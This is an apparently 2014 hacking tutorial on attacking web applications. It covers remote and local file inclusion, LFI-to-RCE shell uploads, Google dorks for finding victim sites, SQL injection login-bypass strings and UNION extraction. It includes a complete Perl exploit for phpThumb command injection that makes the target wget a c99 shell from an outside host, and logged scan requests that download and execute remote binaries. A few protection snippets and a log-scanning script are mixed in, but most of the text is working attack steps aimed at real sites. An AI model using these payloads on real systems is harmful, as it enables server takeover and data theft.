Web-servers & Application Hacking | DOCX
2014
Root
Root-XSecurity
1/1/2014
Web Servers & Application Hacking
Part 1
Web-hacking Attacks
This is a tutorial about web-hacking methods that I and many other hackers have collected.
I thought that many people would learn a lot from it.
Guide content:
- Remote file inclusion
- Local file inclusion
- LFI 2 RCE
- LFI 2 RCE using Firefox
- Local file download
- Full path disclosure
- Command Injection Vulnerability Exploit
- SQL Injection - with load file
- MSSQL Injection
- Blind SQL Injection
- PostgreSQL Injection
- Error based PostgreSQL Injection
- SQL Injection on ASPX
- Dot net nuke
- XSS
- CRLF
- CSRF
- Server Side Includes | Server Side Inclusion
- Symlink Attack
- SQL injection String & Union based
- Xpath Injection
- LDAP Injection
- DNS Zone Transfer Vulnerability Exploit
- Oracle Padding Attack using Burp Suite
So let’s get started !
Remote file inclusion :
1) RFI
RFI (Remote File Inclusion) is a type of web-hacking. It occurs when a PHP script uses the
include() function to include a file whose name comes from a GET parameter. The included file is
usually a page in txt format whose content is printed.
Example:
Code:
http://www.site.com/index.php?page=home
Nowadays RFI is rarely found, and all you need to use it on a vulnerable site is a shell in txt
format.
2) Vulnerable script
Code:
<?php
$page = $_GET['page'];
include($page);
?>
3) Exploiting vulnerability
We have site:
Code:
http://www.site.com/index.php?page=home
Now instead of home we gonna use our shell.
So we get:
Code:
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?
If the site is vulnerable it should show the shell with a list of files from the site you are attacking.
4) Null byte bypass
In some scripts there is weak protection which includes the file after appending an .html (or some
other) extension:
Code:
<?php
$page = $_GET['page'];
include($page.".html");
?>
In that case we are going to use the null byte bypass (%00).
Everything after %00 is ignored. We also use %00 for picture upload bypass as php, but I am not
going to talk about that here.
So link should look like this:
Code:
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?%00
5) Protection script
Script should look like this:
Code:
<?php
$page = $_GET['page'];
include($page);
?>
So we are going to add a check before the include:
Code:
<?php
$page = $_GET['page'];
// Include the page only if it exists under pages/ (the original was missing a closing parenthesis here).
// Note: file_exists() alone still accepts ../ sequences, so the name should also be restricted to a plain file name.
if (file_exists("pages/" . $page)) {
    include("pages/" . $page);
}
?>
Local file inclusion :
1) LFI?
LFI can be used on sites like:
Code:
http://link.com/index.php?page=
by adding
Code:
../../../../../../etc/passwd
(sometimes you have to add %00 after passwd).
2) Finding vulnerable sites:
Code:
index.php?page=
index.php?option=
search.php?word=
3) Checking site vulnerability:
Find some site and use
Code:
../../../../../../../../../../../etc/passwd
or
Code:
../../../../../../../../../../../etc/passwd%00
When you enter this in the link you get this:
Code:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
ntp:x:103:106::/home/ntp:/bin/false
snmp:x:104:65534::/var/lib/snmp:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
which means that the site is vulnerable.
4) proc/self/environ
Now we want to see if we can reach /proc/self/environ through the site, so that we can upload a
shell to the site.
Instead of etc/passwd%00 we are going to put /proc/self/environ
If the page prints this:
Code:
DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.website.com
HTTP_REFERER=http://www.website.com/etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster**website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE= Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Serv..........
then proc/self/environ is enabled, so we can upload the shell.
5) Shell uploading
To upload the shell we need Mozilla Firefox:
Code:
http://www.mozilla.com/firefox/
Add-on Tamper Data:
Code:
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
Open the site, e.g.:
Code:
http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/self/environ
Tools > Tamper Data
Click Start Tamper, then refresh the page and in the User-Agent field put this code:
Code:
<?system('wget www.link.com/shell.txt -O shell.php');?>
Click OK. To access the shell use:
Code:
www.link.com/shell.php
LFI 2 RCE
- Find an LFI vulnerable site.
- Check its link.
- Do ->
http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/self/environ
- Open a command prompt and run the script LFI2RCE.exe [C:\lfi2rce.exe "<Website vuln link>"]
- Type Command -: id
- Type Command -: uname -a
- Type Command -: ls -l
- Now upload a "shell" to this web server, so:
- Type Command -: wget http://downlading-link-of-shell.com/c99.php or /c99.zip
- Type Command -: unzip c99.txt.zip
- Type Command -: mv c99.txt c99.php "OR" mv c99.txt Out14ws.php (assuming "out14ws.php" is a public HTML page; the move command will copy the c99.txt text to "opt14ws.php")
- Type Command -: ls | grep Out14ws "OR" ls | grep c99
- Type Command -: pwd [to check the present working directory of the shell]
- Then open the full link of your shell in your web browser; you get:
http://website-name/path/path/c99.php
http://website-name/path/path/opt14ws.php.php
LFI 2 RCE Using Firefox
- Check whether the target is vulnerable to LFI or not.
- E.g. http://www.site.com/index.php?page=../../../../../../../../etc/passwd -: or
http://www.site.com/index.php?page=../../../../../../../../etc/passwd%00
- Now see -:
http://www.site.com/index.php?page=../../../../../../proc/self/environ -: or
http://www.site.com/index.php?page=../../../../../../proc/self/environ%00
- Now in the address bar of Firefox type: "about:config"
- Find -: accessibility.browsewithcaret > right-click > New > String
- NEW STRING VALUE: general.useragent.override
Press "OK"; a new box will pop up asking for: ENTER STRING VALUE
- ENTER STRING VALUE: <?php phpinfo(); ?>
It is general.useragent.override.
After it you will see something like:
- Now check the PHP version and information while refreshing the vulnerable link or page.
Find the disabled information -: disable_functions - system, passthru, shell_exec, popen, escapeshellcmd, proc_open etc...
- Once you have checked the phpinfo, go to the "about:config" page, look for "general.useragent.override" and ENTER STRING VALUE:
- <pre><?php exec('YOUR COMMAND',$result);foreach($result as $output){print "$output\n";}?></pre>
- In place of YOUR COMMAND type some command like ls -a, uname -a, cd /etc/passwd, pwd, etc...
- For uploading a shell you can type the command: wget http://www.site.com/c99.php
Note: after entering a command, to get its output you have to refresh the page or vulnerable link.
- Command -: ls -la
- Output: on refreshing the page
- Command: uname -a
Local file download :
1) LFD?
LFD (Local File Download) is a vulnerability in a script that is used to download files via the GET
method; you can also use it with the POST method using the Tamper Data add-on.
Code:
http://site.com/download_file.php?file=notepad.exe
2) Vulnerable script
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>
3) Vulnerability check
To check if script is vulnerable we are gonna try to download etc/passwd.
So instead of:
Code:
http://site.com/download_file.php?file=notepad.exe
We are gonna use:
Code:
http://site.com/download_file.php?file=../../../../../../../../../etc/passwd
If it starts downloading and the file, opened in a text editor, looks something like this:
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
Script is vulnerable!
NOTE: If it is a windows server use boot.ini instead of etc/passwd.
4) Exploiting vulnerability
Now that we know the script is vulnerable, we want to see which files are on the host. You can do
this in this way:
Code:
http://site.com/download_file.php?file=../
../ takes us one directory back and downloads the file.
1.1 It is possible that it downloads a file which, opened in a text editor, prints the file list of the directory.
1.2 Or it is possible that it downloads a file but when it is opened in a text editor the file is empty.
In case 1.1 we don't have to guess file names and directories and we can download whatever we
want.
In case 1.2 we must guess file names and directories and we can download only files whose names
we guess. There are a few programs that can help us find files (Acunetix and HTTrack Website
Copier).
5) Protection script
We have script mentioned at start:
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>
By adding a file_exists("download/".$file) check we are going to secure the script.
So it should look like:
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
// Serve the file only from the download/ directory (the original was missing the closing brace and ?>).
// Note: file_exists() alone does not stop ../ sequences, so the name should also be restricted to a plain file name.
if(file_exists("download/".$file)) {
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize("download/".$file));
readfile("download/".$file);
exit;
}
}
?>
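As an added example (not the tutorial's own code), here is one helper that serves both the include script from the RFI section and the download script above: it resolves the requested name inside a fixed base directory with realpath() and refuses anything that escapes it, which covers ../ traversal, remote URLs and %00 alike. The pages/ and download/ directories and the allowlist entries are assumptions.

```php
<?php
// Added example, not code from the original tutorial. One helper serves both
// the include script (RFI/LFI section) and the download script (LFD section).
// Assumed layout: pages/ holds includable pages, download/ holds downloadable files.

function safePath(string $baseDir, string $requested): ?string
{
    // Accept only a bare file name: no "/", no NUL byte, no "http://", no "%00".
    // The character class admits nothing but letters, digits, "_", "." and "-",
    // and \z (not $) makes sure a trailing newline is rejected too.
    if (!preg_match('/^[A-Za-z0-9_.-]+\z/', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $full === false || !is_file($full)) {
        return null;                      // base missing, file missing, or a directory
    }
    // realpath() has already resolved symlinks and "..": the result must still
    // sit below the base directory. Comparing with the trailing separator stops
    // "/var/www/download2" from matching a base of "/var/www/download".
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

// File download: same helper, POST-triggered as in the original script, and
// the file name is read from the same POST body rather than from $_GET.
if (isset($_POST['download'])) {
    $filePath = safePath(__DIR__ . '/download', (string) ($_POST['file'] ?? ''));
    if ($filePath === null) {
        http_response_code(404);
        exit('No such file');
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($filePath) . '"');
    header('Content-Length: ' . filesize($filePath));
    readfile($filePath);
    exit;
}

// Page include: the parameter selects from a fixed map, so user input never
// becomes a path at all; safePath() is a second line of defence.
$allowedPages = ['home' => 'home.php', 'about' => 'about.php'];   // assumed pages
$pageKey  = (string) ($_GET['page'] ?? 'home');
$pagePath = isset($allowedPages[$pageKey])
    ? safePath(__DIR__ . '/pages', $allowedPages[$pageKey])
    : null;
if ($pagePath === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $pagePath;
```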
Full path disclosure :
This method lets you, through errors in files or errors made by programmers, see which files are in
which directories. You can't directly hack a site with it; it just helps you while hacking.
It is useful because it makes hacking faster and easier, and it can also help with Local File
Inclusion (LFI) when a folder name or some other file has been changed: you can find out using
FPD.
There are a lot of ways to use an FPD vulnerability on a site; I'll explain the 2 most important.
The 1st is via an array, by adding square brackets to a link like this one:
Code:
index.php?page=home
To trigger the vulnerability add [] in the right place:
Code:
index.php?page[]=home
That will give you an error like this:
Code:
Warning: include(blah/errors.php) [function.include]: failed to open stream:
No such file or directory /home/insekure/public_html/index.php on line 211
From this you can see that the directory blah exists on the site.
The 2nd method is to add the most used cookie (Null Session Cookie); you can add it by JavaScript
injection: by running JavaScript code on the site you will get an error.
This is the JavaScript code:
Code:
javascript:void(document.cookie='PHPSESSID=');
Add that in your address bar and hit enter; now when the page is refreshed you will get this error:
Code:
Warning: session_start() [function.session-start]: The session id contains
illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in
/home/example/public_html/thems/errors.php on line 58
Then try to open the directory thems on the site; that should list the files in that directory.
Protection:
The simplest way to protect against these attacks is to turn off error reporting.
Edit or add:
Code:
error_reporting(0);
Command Injection Vulnerability Exploit
- phpThumb() "fltr[]" Command Injection Vulnerability Exploit Scans
- Automatic Shell Upload
I. phpThumb() "fltr[]" Command Injection Vulnerability
Since the 21st of December 2011 we've identified over 300 attempts to exploit the phpThumb() 'fltr[]'
Parameter Command Injection Vulnerability, aka CVE-2010-1598, reported back in April 2010. Input
passed via the "fltr[]" parameter to phpThumb.php is not properly sanitized before being used in a
command line argument.
This can be exploited to inject and execute arbitrary shell commands via specially crafted requests.
Successful exploitation requires that "ImageMagick" is installed.
The vulnerability is confirmed in version 1.7.9. Other versions may also be affected. This vulnerability can be
exploited with "high_security_enabled" set to "true" by brute forcing the "high_security_password".
Source: phpThumb() "fltr[]" Command Injection Vulnerability
By appending a semi-colon to the "blur" option of the fltr parameter, the attacker is able to execute OS level
commands as there aren't any input validation checks for the $command data in phpthumb.functions.php.
function ImageMagickThumbnailToGD() {
    ...
    foreach ($this->fltr as $filterkey => $filtercommand) {
        @list($command, $parameter) = explode('|', $filtercommand, 2);
        switch ($command) {
            ...
            case 'blur':
                if ($this->ImageMagickSwitchAvailable('blur')) {
                    @list($radius) = explode('|', $parameter);
                    $radius = ($radius ? $radius : 1);
                    $commandline .= ' -blur '.$radius;
                    unset($this->fltr[$filterkey]);
                }
                break;
            ...
    $this->DebugMessage('ImageMagick called as ('.$commandline.')', __FILE__, __LINE__);
    $IMresult = phpthumb_functions::SafeExec($commandline);
    clearstatcache();
    if (@$IMtempSourceFilename && file_exists($IMtempSourceFilename)) {
        @unlink($IMtempSourceFilename);
    }
    if (!@file_exists($IMtempfilename) || !@filesize($IMtempfilename)) {
        $this->FatalError('ImageMagick failed with message ('.trim($IMresult).')');
        $this->DebugMessage('ImageMagick failed with message ('.trim($IMresult).')', __FILE__, __LINE__);
    ...
}
The issue was first addressed in version 1.7.10 and in version 1.7.11 the author added even more explicit
escaping of command line parameters according to the changelog.
escapeshellarg
The updated code uses the php escapeshellarg function and also limits the length of the input.
case 'blur':
    if ($this->ImageMagickSwitchAvailable('blur')) {
        @list($radius) = explode('|', $parameter);
        $radius = (!empty($radius) ? min(max(intval($radius), 0), 25) : 1);
        $commandline .= ' -blur '.escapeshellarg($radius);
        $successfullyProcessedFilters[] = $filterkey;
    }
    break;
The problem with these extensions is that they use dangerous PHP functions which have the potential to
mess up a web hosting server and hack / exploit user accounts further up to root level.
Hackers, who use an insecure PHP script as an entry point to a web hosting server, can start unleashing
dangerous commands and take control over the complete server quickly.
Certain functions which are used in such scripts are considered as dangerous and are turned off in the PHP
configuration by certain responsible webhosts.
(Un)fortunately escapeshellarg is often part of the disabled functions so either way you can’t win except
by staying away from scripts that use these dangerous functions.
Find the location of your php.ini file. Open that file, look for "disable_functions" and replace it with
the following line:
disable_functions = exec,system,passthru,readfile,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,popen,parse_ini_file,show_source,curl_exec
Source: Disabling dangerous PHP functions
3.5 php.ini & disabled functions
safe_mode = On
expose_php = Off
enable_dl = Off
magic_quotes = On
register_globals = Off
display_errors = Off
disable_functions = system, show_source, symlink, exec, dl, shell_exec, passthru, phpinfo, escapeshellarg, escapeshellcmd
Source: How To: WHM/cPanel Hardening & Security - The Basics - Part 1
Exploit Scans
The queries are as follows:
GET /phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 HTTP/1.1
GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 HTTP/1.1
GET /manager/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; &phpThumbDebug=9 HTTP/1.1
Breakdown of the requests / commands:
Exploit the vulnerability in the phpThumb.php fltr[] parameter.
GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg;
Display all information about files / directories - shows long listing information about the file / directory.
ls -l /tmp;
Download file barbut6 from bingoooo.co.uk and write output to file /tmp/barbut6.
wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;
Usually default permissions are set to 0644, change file permission to 0755 for owner / group / others so
that the file can be executed.
chmod 0755 /tmp/barbut6;
Run / Execute file barbut6.
/tmp/barbut6;
The ps command gives a snapshot of the current processes.
On most systems derived from BSD, ps commonly runs with the non-standard options aux, where "a" lists
all processes on a terminal, including those of other users, "x" lists all processes without controlling
terminals and "u" adds a column for the controlling user for each process. Note that, for maximum
compatibility when using this syntax, there is no "-" in front of the "aux".
ps -aux;
Send SIGKILL to all perl processes. SIGKILL (Signal number 9) is a forced shutdown of a process. Note that
with SIGKILL the process will not have opportunity to clean up any system resources it was using (e.g.
temporary files etc.).
killall -9 perl;
Start perl and run / execute file f.
perl /tmp/f;
The output will be kept in the picture debug, created through the parameter phpThumbDebug = 9.
&phpThumbDebug=9
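As an added example (not part of the original post or of phpThumb), the following PHP script flags the two request patterns this page describes, the phpThumb fltr[] command-injection probes and the ../ and /proc/self/environ LFI probes, in Apache combined-format access log lines. The log lines are constructed for the example and use the 203.0.113.0/24 documentation range.

```php
<?php
// Added example, not code from the original post or from phpThumb. It scans
// Apache combined-format access log lines for the two probe patterns described
// above: phpThumb fltr[] command injection and ../ or /proc/self/environ LFI.
// The log lines are constructed for this example (203.0.113.0/24 is a
// documentation range).

const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [21/Dec/2011:10:01:02 +0000] "GET /phpThumb.php?src=file.jpg&fltr[]=blur|9 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Dec/2011:10:01:09 +0000] "GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20fail.jpg%20;%20ls%20-l%20/tmp;&phpThumbDebug=9 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Dec/2011:10:02:11 +0000] "GET /index.php?page=..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00 HTTP/1.1" 200 2048 "-" "Opera/9.80"
203.0.113.9 - - [21/Dec/2011:10:02:40 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048 "-" "Opera/9.80"
LOG;

// Returns a short tag for a suspicious request, or null for a normal one.
function classifyRequest(string $line): ?string
{
    // Pull the request target out of the quoted request line.
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return null;
    }
    $path = (string) parse_url($m[1], PHP_URL_PATH);
    // Decode percent-encoding first, so ..%2F and %00 are seen as "../" and NUL.
    $query = rawurldecode((string) parse_url($m[1], PHP_URL_QUERY));

    // phpThumb probe: a filter value is "name|parameters"; a legitimate one such
    // as "blur|9" never needs a shell separator. A ";" or a backtick after
    // fltr[]= is the injection pattern shown in the requests above.
    if (stripos($path, 'phpthumb.php') !== false
        && preg_match('/fltr\[\]=[^&]*[;`]/', $query)) {
        return 'phpthumb-cmd-injection';
    }
    // LFI probe: repeated ../, a NUL byte, or the pseudo-files this page uses as tests.
    if (preg_match('#(\.\./){2,}|/proc/self/environ|/etc/passwd|\x00#', $query)) {
        return 'lfi-traversal';
    }
    return null;
}

// Walks a whole log and returns [client IP, tag] pairs for flagged lines.
function scanLog(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $tag = classifyRequest($line);
        if ($tag !== null) {
            $hits[] = [strtok($line, ' '), $tag];
        }
    }
    return $hits;
}

foreach (scanLog(SAMPLE_LOG) as [$ip, $tag]) {
    printf("%-15s %s\n", $ip, $tag);
}
```

Run against a real log with `scanLog(file_get_contents('/var/log/apache2/access.log'))`; the first and last sample lines are ordinary requests and produce no output.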
IP List
List of IP's involved in the scans
65.23.154.56 | 77.93.216.38 | 87.98.219.50 | 91.121.100.30 | 91.121.105.174 | 91.121.154.199 | 94.23.51.208 |
200.155.17.68
Targets
GET /cms/plugins/content/jthumbs/includes/phpThumb.php
GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php
GET /common/scripts/phpThumb/phpThumb.php
GET /phpThumb/phpThumb.php
GET /libs/phpThumb/phpThumb.php
GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php
GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php
GET /gallery/phpThumb/phpThumb.php
GET /wp-content/themes/victore/phpthumb/phpThumb.php
GET /wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php
GET /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php
GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php
GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php
GET /js/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
GET /mambots/editors/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
GET /admin/scripts/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
GET /modules/phpThumb/phpThumb.php
GET /lib/phpThumb/phpThumb.php
GET /manager/phpThumb/phpThumb.php
GET /thumb/phpThumb.php
GET /global/phpthumb/phpThumb.php
GET /components/com_hotornot2/phpthumb/phpThumb.php
GET /wp-content/themes/max/scripts/phpThumb/phpThumb.php
GET /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php
GET /staticfiles/phpThumb/phpThumb.php
GET /content/phpthumb/phpthumb.php
GET /class/phpthumb/phpThumb.php
GET /admin/phpThumb/phpThumb.php
GET /phpThumb.php
GET /admin/upload/phpThumb.php
GET /assets/components/phpthumb/phpThumb.php
GET /components/com_alphacontent/assets/phpthumb/phpThumb.php
GET /components/com_hotornot2/phpthumb/phpThumb.php
GET /components/com_alphauserpoints/assets/phpThumb/phpThumb.php
GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
GET /zadmin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php
GET /components/com_flexicontent/librairies/phpthumb/phpThumb.php
GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php
II. Automatic Shell Upload Perl Script
Note: Please change the c991.txt address to your own shell address.
#!/usr/bin/perl
# Exploit Title: phpThumb v. <= 1.7.9 Remote Command Injection (Automatic Shell Upload)
# Date:09/09/2013
# Author: D35m0nd142
# Vendor Homepage: http://phpthumb.sourceforge.net/
# Tested on: phpThumb 1.7.9
# Enter the website in this form -->
# http://mobileworld24.pl/wpcontent/themes/mobileworld24/inc/phpThumb/
use LWP::UserAgent;
use HTTP::Request;
$target = $ARGV[0];
if($target eq '')
{
print "======================================================\n";
print " phpThumb <= 1.7.9 Remote Command Injection exploit \n";
print " (Automatic Shell Upload) \n";
print " created by D35m0nd142 \n";
print "======================================================\n";
sleep(0.8);
print "Usage: perl phpthumb.pl <target> \n";
exit(1);
}
if ($target !~ /http:\/\//)
{
$target = "http://$target";
}
#print "[*] Enter the address of your hosted TXT shell (ex: 'http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
#sleep(1);
print "======================================================\n";
print " phpThumb <= 1.7.9 Remote Command Injection exploit \n";
print " (Automatic Shell Upload) \n";
print " created by D35m0nd142 \n";
print "======================================================\n";
sleep(1.1);
print "[*] Sending exploit ... \n";
sleep(1.1);
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1');
#print "Enter the command to execute => ";
#$cmd = <STDIN>;
$website = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; wget kratos91.altervista.org/c991.txt -O c991.txt ; &phpThumbDebug=9";
$request = $agent->request(HTTP::Request->new(GET=>$website));
if ($request->is_success && ($request->content =~ /Malformed header from CGI/ || $request->content =~ /Saving to: / ))
{
print "[+] Exploit sent with success. \n";
sleep(1.4);
}
else
{
print "[-] Exploit sent but probably the website is not vulnerable. \n";
sleep(1.3);
}
print "[*] Controlling if the txt shell has been uploaded ...\n";
sleep(1.2);
$cwebsite = "$target/c991.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($creq->is_success && ($creq->content =~ /c99shell.php/ || $creq->content =~ /shell/ ))
{
print "[+] Txt Shell uploaded :) \n";
sleep(1);
print "[*] Moving it to PHP format ... wait please ... \n";
sleep(1.1);
$mvwebsite = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv c991.txt shell.php ; &phpThumbDebug=9";
$mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
$cwebsite = "$target/shell.php";
$c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($c2req->is_success && ($c2req->content =~ "/<b>Command execute</b></a>::</b></p></td></tr/" || $c2req->content =~ /Safe-mode/ || $c2req->content =~ /c99shell/ || $c2req->content =~ /r57shell/ || $c2req->content =~ /uname -a/ || $c2req->content =~ /shell/ ))
{
print "[+] PHP Shell injected => '$cwebsite' :) \n";
sleep(0.8);
print "[*] Do you want to open it? (y/n) => ";
$open = <STDIN>;
if ($open == "y")
{
$firefox = "firefox $cwebsite";
system($firefox);
}
}
else
{
print "[-] Error while moving shell from Txt to Php :( \n";
exit(1);
}
}
else
{
print "[-] Txt shell not uploaded. :( \n";
}
MYSQL Injection :
1) Dorks
Code:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administrator_login.asp
I am going to use:
Code:
http://site.com/Admin_Login.asp
2) Logging
Now you can find some site over these dorks and try to log in with:
Username: Admin
Password: password' or 1=1--
Instead of password' or 1=1 you can use one of these:
Code:
'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'
password' or 1=1 will confuse the server and let you log in.
So if you are able to log in, the site is vulnerable and you will be able to use the admin panel.
SQL Injection :
1) SQL Injection?
SQL Injection is a type of web attack. The attacker uses a hole in the script to take all data from the database.
Vulnerable sites are in the format:
Code:
http://www.link.com/index.php?id=
You can put anything else instead of index.
2) Finding vulnerable sites:
Best way to find vulnerable site is by using Google. We use these dorks to find sites:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=
3) Site vulnerability check:
There are 2 ways to check if a site is vulnerable.
1st way: we have the link:
Code:
http://site.com/book.php?id=141
We are going to add only ' at the end of the link so we get this link:
Code:
http://site.com/book.php?id=141'
2nd way: we have the link:
Code:
http://site.com/book.php?id=141
We are going to add +and+1=2-- at the end of the link so we get:
Code:
http://site.com/book.php?id=141+and+1=2--
If some part of the page disappears (picture, text or something) or any error appears (such as: You
have an error in your SQL syntax), the site is vulnerable.
4) Finding number of columns
We can do it by using order by, on the link:
Code:
http://site.com/book.php?id=141
adding +order+by+5--
Code:
http://site.com/book.php?id=141+order+by+5--
If the page opens normally there are more than 5 columns. Let's try with 10.
Code:
http://site.com/book.php?id=141+order+by+10--
Now some part of the site disappeared, which means that there are more than 5 and fewer than 10
columns. Let's try 7.
Code:
http://site.com/book.php?id=141+order+by+7--
The page opens normally, which means that there are more than 7 and fewer than 10 columns. Let's
try 8.
Code:
http://site.com/book.php?id=141+order+by+8--
With column 8 part of the site disappears, which means that there are 7 columns.
5) Finding vulnerable columns
Finding vulnerable columns is done with union select all; on the link (in this case) we are
going to add +union+select+all+1,2,3,4,5,6,7--
Code:
http://site.com/book.php?id=-141+union+select+all+1,2,3,4,5,6,7--
It is going to write numbers on the page (in this case 1 2 3 4 5 6 7), which means that data can be
taken from any of those columns. We are going to take it from the second column.
